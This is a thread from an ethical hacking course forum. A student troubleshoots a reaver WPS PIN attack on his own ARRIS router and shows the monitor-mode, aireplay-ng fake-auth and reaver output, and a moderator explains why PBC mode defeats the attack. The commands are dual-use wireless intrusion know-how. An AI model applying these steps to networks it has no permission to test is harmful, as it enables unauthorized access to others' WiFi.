  • #52065
    thiago
    Participant

    Dear Mr. Zaid,

    I'm doing the Learn Ethical Hacking From Scratch course. First of all, I'd like to praise you for the course; it's excellent. Sorry for any translation problems, because I'm from Brazil and my English is not perfect.

    I'm not able to hack my WiFi network without a wordlist. Here is what I have done so far:

    I bought a budget Realtek RTL8812AU IEEE 802.11 and installed the driver on Windows (host machine). It seems to be working, as I was able to hack my WiFi network using a wordlist.

    In terminal I ran:
    ifconfig wlan0 down ; airmon-ng check kill ; iwconfig wlan0 mode monitor ; ifconfig wlan0 up ; iwconfig

    Here is the result:
    wlan0 IEEE 802.11 Mode:Monitor Frequency:2.412 GHz Tx-Power=18 dBm
    Retry short limit:7 RTS thr:off Fragment thr:off
    Power Management:off

    I installed the reaver version provided by you.

    I split the terminal in two.

    Terminal 1 (ran second):
    aireplay-ng --fakeauth 30 -a [MAC target network] -h [MAC my router] wlan0

    response:
    14:36:28 Sending Authentication Request (Open System) [ACK]
    14:36:28 Authentication successful
    14:36:28 Sending Association Request [ACK]
    14:36:28 Association successful :-) (AID: 1)

    14:36:43 Sending keep-alive packet [ACK]
    14:36:56 Got a deauthentication packet! (Waiting 3 seconds)

    14:36:59 Sending Authentication Request (Open System) [ACK]
    14:36:59 Authentication successful
    14:36:59 Sending Association Request [ACK]
    14:36:59 Association successful :-) (AID: 1)

    Terminal 2 (ran first):
    aireplay-ng --fakeauth 30 -a [MAC target network] -h [MAC my router] wlan0

    response:
    Reaver v1.6.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

    [+] Switching wlan0 to channel 1
    [?] Restore previous session for 00:1D:D5:C4:F3:60? [n/Y] n
    [+] Waiting for beacon from 00:1D:D5:C4:F3:60
    [+] Associated with 00:1D:D5:C4:F3:60 (ESSID: Net Virtua 52)
    [+] Trying pin "12345670"
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin "12345670"
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin

    What are the WPS transaction failed 0x03 and 0x02 codes?

    After a while all I keep getting is the WARNING: Receive timeout occurred.

    Here is my target router configuration: https://drive.google.com/file/d/1oOGBvD5EtCgOrqWVefBStdV6MtUA7B4T/view?usp=sharing

    Is it possible to hack the network with the WPS mode on PBC? When I try to change the WPS mode to PIN mode, set 12345670 as the Enrollee PIN Code and click the apply button, the page reloads and it goes back to PBC mode. I'm not able to change this setting. It is an ARRIS router.

    Best regards,
    Thiago

    #52070
    Diego Pérez
    Moderator

    Hi!

    As mentioned in the lecture, this method only works against some routers; it won't work against modern routers or ones that use PBC. Zaid still covered it, though, because if it works then it's a very good method to get the password, as it is guaranteed. If it didn't work, then please try the method explained in the next lectures.
    See, this method only works if the target uses PIN authentication, because when PBC is enabled the router will refuse all requests and all PINs, even if we send it the right PIN, unless the WPS button is pressed. If you are the attacker, you won't know if your target is using PBC authentication or not; you have to try this method. It still works against some routers, and if it is working it will give you a clear way to get a key.

    So it looks like you can't change its configuration; in this case this attack will not work.

    Greetings!
    Diego
